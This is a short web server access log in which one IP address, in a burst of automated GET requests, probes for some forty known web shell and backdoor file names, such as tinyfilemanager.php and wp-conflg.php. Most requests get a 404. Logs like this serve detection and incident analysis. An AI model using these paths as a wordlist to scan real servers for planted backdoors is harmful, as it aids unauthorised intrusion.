20.41.98.199 - - [03/Feb/2026:21:32:47 +0800] "GET /lc.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /hexx.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /cbrfo.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /inc.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /jquery.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /gifclass.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /miansha.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:48 +0800] "GET /tinyfilemanager.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:49 +0800] "GET //xfile25.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:49 +0800] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:49 +0800] "GET /ok.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:49 +0800] "GET /fi.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:49 +0800] "GET /muzu.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:49 +0800] "GET /reze.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:50 +0800] "GET /styll.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:50 +0800] "GET /x7.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:50 +0800] "GET /thebe.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:50 +0800] "GET /ddd.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:50 +0800] "GET /ccs.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:51 +0800] "GET /f355.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:51 +0800] "GET /bgymj.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:51 +0800] "GET /8xyz.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:51 +0800] "GET /la.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:51 +0800] "GET /ioxi.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:51 +0800] "GET /xpwer1.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET //lala.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET //about.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET /wp-admin/images/commentv.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET //cgi-bin/index.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET //wp-admin/images/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET /wp-admin/images/wp-conflg.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:52 +0800] "GET /info.php HTTP/1.1" 200 29 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:53 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:53 +0800] "GET /x/ HTTP/1.1" 404 31367 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:54 +0800] "GET /ss1.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:54 +0800] "GET //goods.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:54 +0800] "GET /222.php HTTP/1.1" 404 27 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:54 +0800] "GET /wp-includes/blocks/code/ HTTP/1.1" 403 146 "-" "-"
20.41.98.199 - - [03/Feb/2026:21:32:54 +0800] "GET //adminfuns.php HTTP/1.1" 404 27 "-" "-"
